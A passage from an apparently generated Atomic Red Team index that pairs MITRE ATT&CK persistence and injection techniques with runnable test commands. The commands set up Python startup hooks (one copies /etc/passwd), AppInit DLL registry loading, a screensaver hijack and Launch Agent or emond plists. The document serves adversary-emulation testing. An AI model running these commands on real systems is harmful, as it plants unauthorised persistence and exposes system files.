"import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
Get-ChildItem -Path "$UserDir"
& "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
-ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
}; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
(-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
| Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
|\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
\nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
-Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
-Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
- name: Python Startup Hook - atomic_hook.pth (Linux)
auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
description: "Executes code by creating atomic_hook.pth in the site-packages
directory. \nThis script runs automatically for every user on the system when
Python starts.\n"
supported_platforms:
- linux
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
'
executor:
name: sh
elevation_required: false
command: |
TEMPDIR="/tmp/atomic_sitecust_posix"
mkdir -p "$TEMPDIR"
"#{python_exe}" -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
ls -la "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
cleanup_command: |
if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
rm -rf /tmp/atomic_sitecust_posix
echo "[+] Successful Removed atomic_hook.pth"
rm -rf /tmp/atomic_hook_poc.txt
echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
- name: Python Startup Hook - atomic_hook.pth (macOS)
auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
description: 'Creates a Python startup hook using a .pth file inside a virtual
environment on macOS.
'
supported_platforms:
- macos
input_arguments:
exe_name:
description: App to launch
type: string
default: Calculator
python_exe:
description: The python binary name to test
type: string
default: python3
dependency_executor_name: sh
dependencies:
- description: Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
prereq_command: |
PYTHON_CMD=$(command -v python || command -v #{python_exe})
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
(''brew install python'' or ''brew install python3 or brew install python@3.X'')
or the macOS developer tools (''xcode-select --install'')."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
$PYTHON_EXE -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
pkill "#{exe_name}" || true
[ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
- name: Python Startup Hook - usercustomize.py (Linux / MacOS)
auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require root privileges.\n"
supported_platforms:
- linux
- macos
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
brew install python3 or brew install python@3.x or the macOS developer tools
(''xcode-select --install''))."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
cleanup_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
rm -rf /tmp/poc.txt
echo "[+] Successful remove poc.txt under /tmp"
T1037.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99
created: '2020-01-10T18:01:03.666Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1037/003
external_id: T1037.003
- source_name: Petri Logon Script AD
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
url: https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:21.921Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
be assigned using Active Directory or Group Policy Objects.(Citation: Petri
Logon Script AD) These logon scripts run with the privileges of the user they
are assigned to. Depending on the systems within the network, initializing
one of these scripts could apply to more than one or potentially all systems.
\ \n \nAdversaries may use these scripts to maintain persistence on a network.
Depending on the access configuration of the logon scripts, either local credentials
or an administrator account may be necessary."
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
atomic_tests: []
T1546.010:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd
created: '2020-01-24T14:52:25.589Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/010
external_id: T1546.010
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: AppInit Registry
description: Microsoft. (2006, October). Working with the AppInit_DLLs registry
value. Retrieved July 15, 2015.
url: https://support.microsoft.com/en-us/kb/197571
- source_name: AppInit Secure Boot
description: Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July
15, 2015.
url: https://msdn.microsoft.com/en-us/library/dn280412
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:24.008Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs
value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows
NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows
NT\\CurrentVersion\\Windows are loaded by user32.dll into every process
that loads user32.dll. In practice this is nearly every program, since user32.dll
is a very common library. (Citation: Elastic Process Injection July 2017)\n\nSimilar
to Process Injection, these values can be abused to obtain elevated privileges
by causing a malicious DLL to be loaded and run in the context of separate
processes on the computer. (Citation: AppInit Registry) Malicious AppInit
DLLs may also provide persistence by continuously being triggered by API activity.
\n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions
when secure boot is enabled. (Citation: AppInit Secure Boot)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1546.010
atomic_tests:
- name: Install AppInit Shim
auto_generated_guid: a58d9386-3080-4242-ab5f-454c16503d18
description: "AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs
to be loaded into each user mode process on the system. Upon succesfully execution,
\nyou will see the message \"The operation completed successfully.\" Each
time the DLL is loaded, you will see a message box with a message of \"Install
AppInit Shim DLL was called!\" appear.\nThis will happen regularly as your
computer starts up various applications and may in fact drive you crazy. A
reliable way to make the message box appear and verify the \nAppInit Dlls
are loading is to start the notepad application. Be sure to run the cleanup
commands afterwards so you don't keep getting message boxes showing up.\n\nNote:
If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n"
supported_platforms:
- windows
input_arguments:
registry_file:
description: Windows Registry File
type: path
default: PathToAtomicsFolder\T1546.010\src\T1546.010.reg
registry_cleanup_file:
description: Windows Registry File
type: path
default: PathToAtomicsFolder\T1546.010\src\T1546.010-cleanup.reg
dependency_executor_name: powershell
dependencies:
- description: 'Reg files must exist on disk at specified locations (#{registry_file}
and #{registry_cleanup_file})
'
prereq_command: 'if ((Test-Path "#{registry_file}") -and (Test-Path "#{registry_cleanup_file}"))
{exit 0} else {exit 1}
'
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory (split-path "#{registry_file}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg" -OutFile "#{registry_file}"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg" -OutFile "#{registry_cleanup_file}"
- description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and
T1546.010x86.dll)
'
prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll))
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll" -OutFile C:\Tools\T1546.010x86.dll
executor:
command: 'reg.exe import "#{registry_file}"
'
cleanup_command: 'reg.exe import "#{registry_cleanup_file}" >nul 2>&1
'
name: command_prompt
elevation_required: true
T1546.002:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf
created: '2020-01-24T13:51:01.210Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/002
external_id: T1546.002
- source_name: ESET Gazer Aug 2017
description: 'ESET. (2017, August). Gazing at Gazer: Turla’s new second stage
backdoor. Retrieved September 14, 2017.'
url: https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
- source_name: Wikipedia Screensaver
description: Wikipedia. (2017, November 22). Screensaver. Retrieved December
5, 2017.
url: https://en.wikipedia.org/wiki/Screensaver
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:24.634Z'
name: 'Event Triggered Execution: Screensaver'
description: |-
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:
* SCRNSAVE.exe - set to malicious PE path
* ScreenSaveActive - set to '1' to enable the screensaver
* ScreenSaverIsSecure - set to '0' to not require a password to unlock
* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Bartosz Jerzman
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1546.002
atomic_tests:
- name: Set Arbitrary Binary as Screensaver
auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64
description: 'This test copies a binary into the Windows System32 folder and
sets it as the screensaver so it will execute for persistence. Requires a
reboot and logon.
'
supported_platforms:
- windows
input_arguments:
input_binary:
description: Executable binary to use in place of screensaver for persistence
type: path
default: C:\Windows\System32\cmd.exe
reboot:
description: Set to non-zero value if you want the test to reboot the system
so that changes take effect
type: integer
default: 0
executor:
command: |
reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
if #{reboot} NEQ 0 shutdown /r /t 0
cleanup_command: |
reg import %userprofile%\backup.reg
del %userprofile%\backup.reg
del %SystemRoot%\System32\evilscreensaver.scr
name: command_prompt
elevation_required: true
T1543.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584
created: '2020-01-17T16:10:58.592Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1543/001
external_id: T1543.001
- source_name: AppleDocs Launch Agent Daemons
description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
July 10, 2017.
url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
- source_name: Sofacy Komplex Trojan
description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- source_name: OceanLotus for OS X
description: Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application
Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.
url: https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update
- source_name: OSX Keydnap malware
description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware
is hungry for credentials. Retrieved July 3, 2017.
url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
- source_name: Methods of Mac Malware Persistence
description: Patrick Wardle. (2014, September). Methods of Malware Persistence
on Mac OS X. Retrieved July 5, 2017.
url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: OSX Malware Detection
description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
OS X Malware Detection & Analysis. Retrieved November 17, 2024.'
url: https://papers.put.as/papers/macosx/2016/RSA_OSX_Malware.pdf
- source_name: Antiquated Mac Malware
description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated
code. Retrieved July 5, 2017.
url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
- source_name: OSX.Dok Malware
description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web
traffic. Retrieved July 10, 2017.
url: https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:25.367Z'
name: 'Create or Modify System Process: Launch Agent'
description: "Adversaries may create or modify launch agents to repeatedly execute
malicious payloads as part of persistence. When a user logs in, a per-user
launchd process is started which loads the parameters for each launch-on-demand
user agent from the property list (.plist) file found in /System/Library/LaunchAgents,
/Library/LaunchAgents, and ~/Library/LaunchAgents.(Citation:
AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation:
Antiquated Mac Malware) Property list files use the Label, ProgramArguments
, and RunAtLoad keys to identify the Launch Agent's name,
executable location, and execution time.(Citation: OSX.Dok Malware) Launch
Agents are often installed to perform updates to programs, launch user specified
programs at login, or to conduct other developer tasks.\n\n Launch Agents
can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001)
command.\n \nAdversaries may install a new Launch Agent that executes at login
by placing a .plist file into the appropriate folders with the RunAtLoad
or KeepAlive keys set to true.(Citation: Sofacy
Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent
name may be disguised by using a name from the related operating system or
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Antonio Piazza, @antman1p
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.5'
identifier: T1543.001
atomic_tests:
- name: Launch Agent
auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900
description: 'Create a plist and execute it
'
supported_platforms:
- macos
input_arguments:
plist_filename:
description: filename
type: string
default: com.atomicredteam.plist
path_malicious_plist:
description: Name of file to store in cron folder
type: string
default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist"
dependency_executor_name: bash
dependencies:
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
'
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "The shared library doesn''t exist. Check the path";
exit 1;
'
executor:
name: bash
elevation_required: true
command: |
if [ ! -d ~/Library/LaunchAgents ]; then mkdir ~/Library/LaunchAgents; fi;
sudo cp #{path_malicious_plist} ~/Library/LaunchAgents/#{plist_filename}
sudo launchctl load -w ~/Library/LaunchAgents/#{plist_filename}
cleanup_command: |
sudo launchctl unload ~/Library/LaunchAgents/#{plist_filename}
sudo rm ~/Library/LaunchAgents/#{plist_filename}
- name: Event Monitor Daemon Persistence
auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e
description: "This test adds persistence via a plist to execute via the macOS
Event Monitor Daemon. \n"
supported_platforms:
- macos
input_arguments:
script_location:
description: evil plist location
type: path
default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist"
script_destination:
description: Path where to move the evil plist
type: path
default: "/etc/emond.d/rules/atomicredteam_T1543_001.plist"
empty_file:
description: Random name of the empty file used to trigger emond service
type: string
default: randomflag
executor:
name: bash
elevation_required: true
command: |
sudo cp #{script_location} #{script_destination}
sudo touch /private/var/db/emondClients/#{empty_file}
cleanup_command: |-
sudo rm #{script_destination}
sudo rm /private/var/db/emondClients/#{empty_file}
- name: Launch Agent - Root Directory
auto_generated_guid: 66774fa8-c562-4bae-a58d-5264a0dd9dd7
description: 'Create a plist and execute it
'
supported_platforms:
- macos
input_arguments:
plist_filename:
description: filename
type: string
default: com.atomicredteam.T1543.001.plist
path_malicious_plist:
description: Name of file to store in cron folder
type: string
default: "$PathToAtomicsFolder/T1543.001/src/atomicredteam_T1543_001.plist"
dependency_executor_name: bash
dependencies:
- description: "/Library/LaunchAgents must exist\n"
prereq_command: 'if [ ! -d /Library/LaunchAgents ]; then mkdir /Library/LaunchAgents;
exit 0; fi;
'
get_prereq_command: 'echo "Failed to create /Library/LaunchAgents"; exit 1;
'
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
'
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
try again."; exit 1;
'
executor:
name: bash
elevation_required: true
command: |
sudo cp #{path_malicious_plist} /Library/LaunchAgents/#{plist_filename}
launchctl load -w /Library/LaunchAgents/#{plist_filename}
cleanup_command: |
launchctl unload /Library/LaunchAgents/#{plist_filename}
sudo rm /Library/LaunchAgents/#{plist_filename}
sudo rm /tmp/T1543_001_atomicredteam.txt
T1055.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591
created: '2020-01-14T01:34:10.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/009
external_id: T1055.009
- source_name: Uninformed Needle
description: skape. (2003, January 19). Linux x86 run-time process manipulation.
Retrieved December 20, 2017.
url: http://hick.org/code/skape/papers/needle.txt
- source_name: GDS Linux Injection
description: McNamara, R. (2017, September 5). Linux Based Inter-Process Code
Injection Without Ptrace(2). Retrieved February 21, 2020.
url: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html
- source_name: DD Man
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
url: http://man7.org/linux/man-pages/man1/dd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:25.806Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
privileges. Proc memory injection is a method of executing arbitrary code
in the address space of a separate live process. \n\nProc memory injection
involves enumerating the memory of a process via the /proc filesystem (/proc/[pid])
then crafting a return-oriented programming (ROP) payload with available gadgets/instructions.
Each running process has its own directory, which includes memory mappings.
Proc memory injection is commonly performed by overwriting the target processes’
stack using memory mappings provided by the /proc filesystem. This information
can be used to enumerate offsets (including the stack) and gadgets (or instructions
within the program that can be used to build a malicious payload) otherwise
hidden by process memory protections such as address space layout randomization
(ASLR). Once enumerated, the target processes’ memory map within /proc/[pid]/maps
can be overwritten using dd.(Citation: Uninformed Needle)(Citation: GDS Linux
Injection)(Citation: DD Man) \n\nOther techniques such as [Dynamic Linker
Hijacking](https://attack.mitre.org/techniques/T1574/006) may be used to populate
a target process with more available gadgets. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012),
proc memory injection may target child processes (such as a backgrounded copy
of sleep).(Citation: GDS Linux Injection) \n\nRunning code in the context
of another process may allow access to the process's memory, system/network
resources, and possibly elevated privileges. Execution via proc memory injection
may also evade detection from security products since the execution is masked
under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
x_mitre_version: '1.1'
atomic_tests: []
T1546.016:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56
created: '2022-09-27T18:02:16.026Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/016
external_id: T1546.016
- source_name: Application Bundle Manipulation Brandon Dalton
description: 'Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking
macOS security controls to thwart application bundle manipulation. Retrieved
September 27, 2022.'
url: https://redcanary.com/blog/mac-application-bundles/
- source_name: Debian Manual Maintainer Scripts
description: Debian Policy Manual v4.6.1.1. (2022, August 14). Package maintainer
scripts and installation procedure. Retrieved September 27, 2022.
url: https://www.debian.org/doc/debian-policy/ch-maintainerscripts.html#s-mscriptsinstact
- source_name: Windows AppleJeus GReAT
description: 'Global Research & Analysis Team, Kaspersky Lab (GReAT). (2018,
August 23). Operation AppleJeus: Lazarus hits cryptocurrency exchange with
fake installer and macOS malware. Retrieved September 27, 2022.'
url: https://securelist.com/operation-applejeus/87553/
- source_name: Microsoft Installation Procedures
description: Microsoft. (2021, January 7). Installation Procedure Tables Group.
Retrieved December 27, 2023.
url: https://learn.microsoft.com/windows/win32/msi/installation-procedure-tables-group
- source_name: wardle evilquest parti
description: 'Patrick Wardle. (2020, June 29). OSX.EvilQuest Uncovered part
i: infection, persistence, and more!. Retrieved March 18, 2021.'
url: https://objective-see.com/blog/blog_0x59.html
- source_name: Installer Package Scripting Rich Trouton
description: 'Rich Trouton. (2019, August 9). Installer Package Scripting:
Making your deployments easier, one ! at a time. Retrieved September 27,
2022.'
